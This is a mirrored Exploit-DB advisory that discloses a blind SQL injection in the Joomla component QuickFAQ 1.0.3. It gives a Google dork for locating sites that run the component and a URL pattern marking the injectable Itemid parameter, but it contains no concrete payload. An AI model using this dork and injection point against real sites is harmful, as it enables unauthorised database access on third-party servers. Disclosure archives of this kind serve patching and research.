Joomla! Component QuickFAQ 1.0.3 – Blind SQL Injection

• Exploit Database
• 530 阅读

• 作者： RoAd_KiLlEr
  日期： 2010-07-09
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/14296/
• 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44

  ----------------------------------------------------------------------------------------- Joomla Component(com_quickfaq)BSQL-i Vulnerability ----------------------------------------------------------------------------------------- [+]TitleJoomla Component(com_quickfaq)BSQL-i Vulnerability [+]Author**RoAd_KiLlEr** [+]ContactRoAd_KiLlEr[at]Khg-Crew[dot]Ws [+]Tested on Win Xp Sp 2/3 --------------------------------------------------------------------------- [~] Founded by **RoAd_KiLlEr** [~] Team: Albanian Hacking Crew [~] Contact: RoAd_KiLlEr[at]Khg-Crew[dot]Ws [~] Home: http://inj3ct0r.com [~] Vendor: http://www.schlu.net [~] Download Application:http://www.schlu.net/downloads/16-component/77-quickfaq.html [~] Version: 1.0.3 ==========ExPl0iT3d by **RoAd_KiLlEr**==========   [+]Description: QuickFAQ is an easy to use but powerful FAQ management system.   Feature List: * Unlimited Subcategories * Assign FAQ Items to multiple Categories * Create Tags/Labels to flag FAQ Items * Up/down voting of FAQ Items * Favoure FAQ Items to maintain a personal bookmark list * Document uploader/manager * PDF creation of FAQ Items * RTL support * RSS/ATOM Feeds * Detailed statistics * JComments and JomComments integration =========================================   [+] Dork: inurl:"com_quickfaq"   ==========================================     [+].SQL-i Vulnerability =+=+=+=+=+=+=+=+=+   [Exploit]:http://127.0.0.1/path/index.php?option=com_quickfaq&view=category&cid=[Valid Cid]&Itemid= [BSQL-Injection]